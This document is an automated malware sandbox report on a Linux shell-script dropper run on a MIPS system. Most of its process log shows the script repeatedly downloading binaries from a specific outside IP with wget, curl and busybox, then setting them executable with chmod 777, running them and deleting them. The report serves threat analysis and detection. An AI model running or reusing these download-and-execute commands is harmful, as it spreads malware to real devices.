Analysis Overview
SHA256
a7b952c05dab9d1f3a9f1a8ad7f00550a6c560c865445326ffc3ff0ef0da13a2
Threat Level: Shows suspicious behavior
The file 1ac86a90ce63f5179c129c8cf2fda09b.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
File and Directory Permissions Modification
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 01:06
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-28 01:06
Reported
2024-10-28 01:09
Platform
debian9-mipsbe-20240611-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | N/A |
| N/A | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | N/A |
| N/A | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | N/A |
| N/A | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | N/A |
| N/A | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | N/A |
| N/A | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | N/A |
| N/A | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | N/A |
| N/A | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | N/A |
| N/A | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | N/A |
| N/A | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | N/A |
| N/A | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | N/A |
| N/A | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | N/A |
| N/A | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | N/A |
| N/A | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | N/A |
| N/A | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | N/A |
| N/A | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | N/A |
| N/A | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | N/A |
| N/A | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | N/A |
| N/A | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | N/A |
| N/A | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | N/A |
| N/A | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | N/A |
| N/A | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | N/A |
| N/A | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | N/A |
| N/A | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | N/A |
| N/A | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | N/A |
| N/A | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | N/A |
| N/A | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | /usr/bin/curl | N/A |
| File opened for modification | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | /usr/bin/curl | N/A |
Processes
/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
[/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/chmod
[chmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP
[./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/rm
[rm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/usr/bin/wget
[wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/chmod
[chmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK
[./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/rm
[rm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/usr/bin/wget
[wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/chmod
[chmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4
[./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/rm
[rm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/usr/bin/wget
[wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/chmod
[chmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F
[./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/rm
[rm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/usr/bin/wget
[wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/chmod
[chmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp
[./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/rm
[rm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/usr/bin/wget
[wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/chmod
[chmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2
[./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/rm
[rm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/usr/bin/wget
[wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/chmod
[chmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3
[./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/rm
[rm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/usr/bin/wget
[wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/chmod
[chmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir
[./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/rm
[rm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/usr/bin/wget
[wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/chmod
[chmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C
[./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/rm
[rm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/usr/bin/wget
[wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/chmod
[chmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7
[./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/rm
[rm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/usr/bin/wget
[wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/chmod
[chmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8
[./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/rm
[rm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/usr/bin/wget
[wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/chmod
[chmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD
[./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/rm
[rm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/usr/bin/wget
[wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/chmod
[chmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d
[./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/rm
[rm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/usr/bin/wget
[wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/chmod
[chmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF
[./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/rm
[rm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/usr/bin/wget
[wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/chmod
[chmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD
[./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/rm
[rm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/usr/bin/wget
[wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/chmod
[chmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d
[./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/rm
[rm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/usr/bin/wget
[wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/chmod
[chmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF
[./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/rm
[rm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/usr/bin/wget
[wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/chmod
[chmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP
[./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/rm
[rm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/usr/bin/wget
[wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/chmod
[chmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK
[./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/rm
[rm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/usr/bin/wget
[wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/chmod
[chmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4
[./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/rm
[rm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/usr/bin/wget
[wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/chmod
[chmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir
[./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/rm
[rm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/usr/bin/wget
[wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/chmod
[chmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C
[./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/rm
[rm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/usr/bin/wget
[wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/chmod
[chmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7
[./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/rm
[rm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/usr/bin/wget
[wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/chmod
[chmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8
[./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/rm
[rm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/usr/bin/wget
